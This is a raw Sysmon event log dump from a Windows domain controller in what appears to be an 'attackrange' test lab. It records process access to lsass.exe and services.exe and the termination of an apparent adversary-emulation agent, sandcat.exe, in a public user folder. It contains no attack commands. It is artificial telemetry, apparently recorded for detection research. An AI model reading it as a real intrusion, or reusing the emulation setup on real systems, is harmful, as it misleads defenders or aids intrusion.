13:34:14.812{59A5CD1D-8E44-6005-0A00-00000000A301}8481100C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.799{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe10.0.14393.4169 (rs1_release.210107-1130)Spooler SubSystem AppMicrosoft® Windows® Operating SystemMicrosoft Corporationspoolsv.exeC:\Windows\System32\spoolsv.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=87E844BD124333302C9DCF947D98B3A3,SHA256=4C3316B6F7671B2E859B2BC98702C7973FB9BC7A6EA71EDB6ACDFE2CF23EB7A0,IMPHASH=A40033EBEE6E37CE4B1D96B817E1BCC7{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.794{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.793{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.793{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.793{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x80000000000000001182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.776{59A5CD1D-8E4D-6005-2500-00000000A301}2988C:\Users\Public\sandcat.exe 10341000x80000000000000001181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:09.533{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:09.533{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.252{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.252{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.252{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.252{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:08.252{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 10341000x80000000000000001174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.252{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.252{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.252{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.252{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.252{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.252{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.236{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.236{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.236{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.236{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.236{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 